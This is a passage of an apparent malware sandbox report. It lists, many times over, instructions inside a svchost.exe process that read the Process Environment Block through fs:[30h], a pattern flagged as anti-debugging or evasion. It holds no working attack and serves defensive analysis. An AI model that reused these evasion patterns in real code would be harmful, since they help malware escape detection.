            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031C62A0 mov eax, dword ptr fs:[00000030h]1_2_031C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031C62A0 mov eax, dword ptr fs:[00000030h]1_2_031C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031C62A0 mov eax, dword ptr fs:[00000030h]1_2_031C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0313A2C3 mov eax, dword ptr fs:[00000030h]1_2_0313A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0313A2C3 mov eax, dword ptr fs:[00000030h]1_2_0313A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0313A2C3 mov eax, dword ptr fs:[00000030h]1_2_0313A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0313A2C3 mov eax, dword ptr fs:[00000030h]1_2_0313A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0313A2C3 mov eax, dword ptr fs:[00000030h]1_2_0313A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031402E1 mov eax, dword ptr fs:[00000030h]1_2_031402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031402E1 mov eax, dword ptr fs:[00000030h]1_2_031402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031402E1 mov eax, dword ptr fs:[00000030h]1_2_031402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032062D6 mov eax, dword ptr fs:[00000030h]1_2_032062D6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031DA118 mov ecx, dword ptr fs:[00000030h]1_2_031DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031DA118 mov eax, dword ptr fs:[00000030h]1_2_031DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031DA118 mov eax, dword ptr fs:[00000030h]1_2_031DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031DA118 mov eax, dword ptr fs:[00000030h]1_2_031DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031F0115 mov eax, dword ptr fs:[00000030h]1_2_031F0115
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031DE10E mov eax, dword ptr fs:[00000030h]1_2_031DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031DE10E mov ecx, dword ptr fs:[00000030h]1_2_031DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031DE10E mov eax, dword ptr fs:[00000030h]1_2_031DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031DE10E mov eax, dword ptr fs:[00000030h]1_2_031DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031DE10E mov ecx, dword ptr fs:[00000030h]1_2_031DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031DE10E mov eax, dword ptr fs:[00000030h]1_2_031DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031DE10E mov eax, dword ptr fs:[00000030h]1_2_031DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031DE10E mov ecx, dword ptr fs:[00000030h]1_2_031DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031DE10E mov eax, dword ptr fs:[00000030h]1_2_031DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031DE10E mov ecx, dword ptr fs:[00000030h]1_2_031DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03160124 mov eax, dword ptr fs:[00000030h]1_2_03160124
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0312C156 mov eax, dword ptr fs:[00000030h]1_2_0312C156
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031C8158 mov eax, dword ptr fs:[00000030h]1_2_031C8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03204164 mov eax, dword ptr fs:[00000030h]1_2_03204164
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03204164 mov eax, dword ptr fs:[00000030h]1_2_03204164
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03136154 mov eax, dword ptr fs:[00000030h]1_2_03136154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03136154 mov eax, dword ptr fs:[00000030h]1_2_03136154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031C4144 mov eax, dword ptr fs:[00000030h]1_2_031C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031C4144 mov eax, dword ptr fs:[00000030h]1_2_031C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031C4144 mov ecx, dword ptr fs:[00000030h]1_2_031C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031C4144 mov eax, dword ptr fs:[00000030h]1_2_031C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031C4144 mov eax, dword ptr fs:[00000030h]1_2_031C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B019F mov eax, dword ptr fs:[00000030h]1_2_031B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B019F mov eax, dword ptr fs:[00000030h]1_2_031B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B019F mov eax, dword ptr fs:[00000030h]1_2_031B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B019F mov eax, dword ptr fs:[00000030h]1_2_031B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0312A197 mov eax, dword ptr fs:[00000030h]1_2_0312A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0312A197 mov eax, dword ptr fs:[00000030h]1_2_0312A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0312A197 mov eax, dword ptr fs:[00000030h]1_2_0312A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03170185 mov eax, dword ptr fs:[00000030h]1_2_03170185
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031EC188 mov eax, dword ptr fs:[00000030h]1_2_031EC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031EC188 mov eax, dword ptr fs:[00000030h]1_2_031EC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031D4180 mov eax, dword ptr fs:[00000030h]1_2_031D4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031D4180 mov eax, dword ptr fs:[00000030h]1_2_031D4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032061E5 mov eax, dword ptr fs:[00000030h]1_2_032061E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031AE1D0 mov eax, dword ptr fs:[00000030h]1_2_031AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031AE1D0 mov eax, dword ptr fs:[00000030h]1_2_031AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031AE1D0 mov ecx, dword ptr fs:[00000030h]1_2_031AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031AE1D0 mov eax, dword ptr fs:[00000030h]1_2_031AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031AE1D0 mov eax, dword ptr fs:[00000030h]1_2_031AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031F61C3 mov eax, dword ptr fs:[00000030h]1_2_031F61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031F61C3 mov eax, dword ptr fs:[00000030h]1_2_031F61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031601F8 mov eax, dword ptr fs:[00000030h]1_2_031601F8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0314E016 mov eax, dword ptr fs:[00000030h]1_2_0314E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0314E016 mov eax, dword ptr fs:[00000030h]1_2_0314E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0314E016 mov eax, dword ptr fs:[00000030h]1_2_0314E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0314E016 mov eax, dword ptr fs:[00000030h]1_2_0314E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B4000 mov ecx, dword ptr fs:[00000030h]1_2_031B4000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031D2000 mov eax, dword ptr fs:[00000030h]1_2_031D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031D2000 mov eax, dword ptr fs:[00000030h]1_2_031D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031D2000 mov eax, dword ptr fs:[00000030h]1_2_031D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031D2000 mov eax, dword ptr fs:[00000030h]1_2_031D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031D2000 mov eax, dword ptr fs:[00000030h]1_2_031D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031D2000 mov eax, dword ptr fs:[00000030h]1_2_031D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031D2000 mov eax, dword ptr fs:[00000030h]1_2_031D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031D2000 mov eax, dword ptr fs:[00000030h]1_2_031D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031C6030 mov eax, dword ptr fs:[00000030h]1_2_031C6030
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0312A020 mov eax, dword ptr fs:[00000030h]1_2_0312A020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0312C020 mov eax, dword ptr fs:[00000030h]1_2_0312C020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03132050 mov eax, dword ptr fs:[00000030h]1_2_03132050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B6050 mov eax, dword ptr fs:[00000030h]1_2_031B6050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0315C073 mov eax, dword ptr fs:[00000030h]1_2_0315C073
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0313208A mov eax, dword ptr fs:[00000030h]1_2_0313208A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031F60B8 mov eax, dword ptr fs:[00000030h]1_2_031F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031F60B8 mov ecx, dword ptr fs:[00000030h]1_2_031F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031280A0 mov eax, dword ptr fs:[00000030h]1_2_031280A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031C80A8 mov eax, dword ptr fs:[00000030h]1_2_031C80A8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B20DE mov eax, dword ptr fs:[00000030h]1_2_031B20DE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0312C0F0 mov eax, dword ptr fs:[00000030h]1_2_0312C0F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031720F0 mov ecx, dword ptr fs:[00000030h]1_2_031720F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0312A0E3 mov ecx, dword ptr fs:[00000030h]1_2_0312A0E3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031380E9 mov eax, dword ptr fs:[00000030h]1_2_031380E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B60E0 mov eax, dword ptr fs:[00000030h]1_2_031B60E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03130710 mov eax, dword ptr fs:[00000030h]1_2_03130710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03160710 mov eax, dword ptr fs:[00000030h]1_2_03160710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0316C700 mov eax, dword ptr fs:[00000030h]1_2_0316C700
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0316273C mov eax, dword ptr fs:[00000030h]1_2_0316273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0316273C mov ecx, dword ptr fs:[00000030h]1_2_0316273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0316273C mov eax, dword ptr fs:[00000030h]1_2_0316273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031AC730 mov eax, dword ptr fs:[00000030h]1_2_031AC730
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0316C720 mov eax, dword ptr fs:[00000030h]1_2_0316C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0316C720 mov eax, dword ptr fs:[00000030h]1_2_0316C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03130750 mov eax, dword ptr fs:[00000030h]1_2_03130750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031BE75D mov eax, dword ptr fs:[00000030h]1_2_031BE75D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03172750 mov eax, dword ptr fs:[00000030h]1_2_03172750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03172750 mov eax, dword ptr fs:[00000030h]1_2_03172750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B4755 mov eax, dword ptr fs:[00000030h]1_2_031B4755
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0316674D mov esi, dword ptr fs:[00000030h]1_2_0316674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0316674D mov eax, dword ptr fs:[00000030h]1_2_0316674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0316674D mov eax, dword ptr fs:[00000030h]1_2_0316674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03138770 mov eax, dword ptr fs:[00000030h]1_2_03138770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03140770 mov eax, dword ptr fs:[00000030h]1_2_03140770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03140770 mov eax, dword ptr fs:[00000030h]1_2_03140770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03140770 mov eax, dword ptr fs:[00000030h]1_2_03140770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03140770 mov eax, dword ptr fs:[00000030h]1_2_03140770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03140770 mov eax, dword ptr fs:[00000030h]1_2_03140770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03140770 mov eax, dword ptr fs:[00000030h]1_2_03140770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03140770 mov eax, dword ptr fs:[00000030h]1_2_03140770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03140770 mov eax, dword ptr fs:[00000030h]1_2_03140770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03140770 mov eax, dword ptr fs:[00000030h]1_2_03140770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03140770 mov eax, dword ptr fs:[00000030h]1_2_03140770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03140770 mov eax, dword ptr fs:[00000030h]1_2_03140770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03140770 mov eax, dword ptr fs:[00000030h]1_2_03140770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031D678E mov eax, dword ptr fs:[00000030h]1_2_031D678E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031307AF mov eax, dword ptr fs:[00000030h]1_2_031307AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031E47A0 mov eax, dword ptr fs:[00000030h]1_2_031E47A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0313C7C0 mov eax, dword ptr fs:[00000030h]1_2_0313C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B07C3 mov eax, dword ptr fs:[00000030h]1_2_031B07C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031347FB mov eax, dword ptr fs:[00000030h]1_2_031347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031347FB mov eax, dword ptr fs:[00000030h]1_2_031347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031527ED mov eax, dword ptr fs:[00000030h]1_2_031527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031527ED mov eax, dword ptr fs:[00000030h]1_2_031527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031527ED mov eax, dword ptr fs:[00000030h]1_2_031527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031BE7E1 mov eax, dword ptr fs:[00000030h]1_2_031BE7E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03172619 mov eax, dword ptr fs:[00000030h]1_2_03172619
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031AE609 mov eax, dword ptr fs:[00000030h]1_2_031AE609
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0314260B mov eax, dword ptr fs:[00000030h]1_2_0314260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0314260B mov eax, dword ptr fs:[00000030h]1_2_0314260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0314260B mov eax, dword ptr fs:[00000030h]1_2_0314260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0314260B mov eax, dword ptr fs:[00000030h]1_2_0314260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0314260B mov eax, dword ptr fs:[00000030h]1_2_0314260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0314260B mov eax, dword ptr fs:[00000030h]1_2_0314260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0314260B mov eax, dword ptr fs:[00000030h]1_2_0314260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0314E627 mov eax, dword ptr fs:[00000030h]1_2_0314E627
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03166620 mov eax, dword ptr fs:[00000030h]1_2_03166620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03168620 mov eax, dword ptr fs:[00000030h]1_2_03168620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0313262C mov eax, dword ptr fs:[00000030h]1_2_0313262C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0314C640 mov eax, dword ptr fs:[00000030h]1_2_0314C640
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03162674 mov eax, dword ptr fs:[00000030h]1_2_03162674
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031F866E mov eax, dword ptr fs:[00000030h]1_2_031F866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031F866E mov eax, dword ptr fs:[00000030h]1_2_031F866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0316A660 mov eax, dword ptr fs:[00000030h]1_2_0316A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0316A660 mov eax, dword ptr fs:[00000030h]1_2_0316A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03134690 mov eax, dword ptr fs:[00000030h]1_2_03134690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03134690 mov eax, dword ptr fs:[00000030h]1_2_03134690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031666B0 mov eax, dword ptr fs:[00000030h]1_2_031666B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0316C6A6 mov eax, dword ptr fs:[00000030h]1_2_0316C6A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0316A6C7 mov ebx, dword ptr fs:[00000030h]1_2_0316A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0316A6C7 mov eax, dword ptr fs:[00000030h]1_2_0316A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031AE6F2 mov eax, dword ptr fs:[00000030h]1_2_031AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031AE6F2 mov eax, dword ptr fs:[00000030h]1_2_031AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031AE6F2 mov eax, dword ptr fs:[00000030h]1_2_031AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031AE6F2 mov eax, dword ptr fs:[00000030h]1_2_031AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B06F1 mov eax, dword ptr fs:[00000030h]1_2_031B06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B06F1 mov eax, dword ptr fs:[00000030h]1_2_031B06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031C6500 mov eax, dword ptr fs:[00000030h]1_2_031C6500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03204500 mov eax, dword ptr fs:[00000030h]1_2_03204500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03204500 mov eax, dword ptr fs:[00000030h]1_2_03204500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03204500 mov eax, dword ptr fs:[00000030h]1_2_03204500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03204500 mov eax, dword ptr fs:[00000030h]1_2_03204500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03204500 mov eax, dword ptr fs:[00000030h]1_2_03204500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03204500 mov eax, dword ptr fs:[00000030h]1_2_03204500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03204500 mov eax, dword ptr fs:[00000030h]1_2_03204500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03140535 mov eax, dword ptr fs:[00000030h]1_2_03140535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03140535 mov eax, dword ptr fs:[00000030h]1_2_03140535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03140535 mov eax, dword ptr fs:[00000030h]1_2_03140535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03140535 mov eax, dword ptr fs:[00000030h]1_2_03140535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03140535 mov eax, dword ptr fs:[00000030h]1_2_03140535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03140535 mov eax, dword ptr fs:[00000030h]1_2_03140535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0315E53E mov eax, dword ptr fs:[00000030h]1_2_0315E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0315E53E mov eax, dword ptr fs:[00000030h]1_2_0315E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0315E53E mov eax, dword ptr fs:[00000030h]1_2_0315E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0315E53E mov eax, dword ptr fs:[00000030h]1_2_0315E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0315E53E mov eax, dword ptr fs:[00000030h]1_2_0315E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03138550 mov eax, dword ptr fs:[00000030h]1_2_03138550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03138550 mov eax, dword ptr fs:[00000030h]1_2_03138550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0316656A mov eax, dword ptr fs:[00000030h]1_2_0316656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0316656A mov eax, dword ptr fs:[00000030h]1_2_0316656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0316656A mov eax, dword ptr fs:[00000030h]1_2_0316656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0316E59C mov eax, dword ptr fs:[00000030h]1_2_0316E59C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03132582 mov eax, dword ptr fs:[00000030h]1_2_03132582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03132582 mov ecx, dword ptr fs:[00000030h]1_2_03132582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03164588 mov eax, dword ptr fs:[00000030h]1_2_03164588
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031545B1 mov eax, dword ptr fs:[00000030h]1_2_031545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031545B1 mov eax, dword ptr fs:[00000030h]1_2_031545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B05A7 mov eax, dword ptr fs:[00000030h]1_2_031B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B05A7 mov eax, dword ptr fs:[00000030h]1_2_031B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B05A7 mov eax, dword ptr fs:[00000030h]1_2_031B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031365D0 mov eax, dword ptr fs:[00000030h]1_2_031365D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0316A5D0 mov eax, dword ptr fs:[00000030h]1_2_0316A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0316A5D0 mov eax, dword ptr fs:[00000030h]1_2_0316A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0316E5CF mov eax, dword ptr fs:[00000030h]1_2_0316E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0316E5CF mov eax, dword ptr fs:[00000030h]1_2_0316E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0315E5E7 mov eax, dword ptr fs:[00000030h]1_2_0315E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0315E5E7 mov eax, dword ptr fs:[00000030h]1_2_0315E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0315E5E7 mov eax, dword ptr fs:[00000030h]1_2_0315E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0315E5E7 mov eax, dword ptr fs:[00000030h]1_2_0315E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0315E5E7 mov eax, dword ptr fs:[00000030h]1_2_0315E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0315E5E7 mov eax, dword ptr fs:[00000030h]1_2_0315E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0315E5E7 mov eax, dword ptr fs:[00000030h]1_2_0315E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0315E5E7 mov eax, dword ptr fs:[00000030h]1_2_0315E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031325E0 mov eax, dword ptr fs:[00000030h]1_2_031325E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0316C5ED mov eax, dword ptr fs:[00000030h]1_2_0316C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0316C5ED mov eax, dword ptr fs:[00000030h]1_2_0316C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03168402 mov eax, dword ptr fs:[00000030h]1_2_03168402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03168402 mov eax, dword ptr fs:[00000030h]1_2_03168402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03168402 mov eax, dword ptr fs:[00000030h]1_2_03168402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0312E420 mov eax, dword ptr fs:[00000030h]1_2_0312E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0312E420 mov eax, dword ptr fs:[00000030h]1_2_0312E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0312E420 mov eax, dword ptr fs:[00000030h]1_2_0312E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0312C427 mov eax, dword ptr fs:[00000030h]1_2_0312C427
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B6420 mov eax, dword ptr fs:[00000030h]1_2_031B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B6420 mov eax, dword ptr fs:[00000030h]1_2_031B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B6420 mov eax, dword ptr fs:[00000030h]1_2_031B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B6420 mov eax, dword ptr fs:[00000030h]1_2_031B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B6420 mov eax, dword ptr fs:[00000030h]1_2_031B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B6420 mov eax, dword ptr fs:[00000030h]1_2_031B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B6420 mov eax, dword ptr fs:[00000030h]1_2_031B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031EA456 mov eax, dword ptr fs:[00000030h]1_2_031EA456
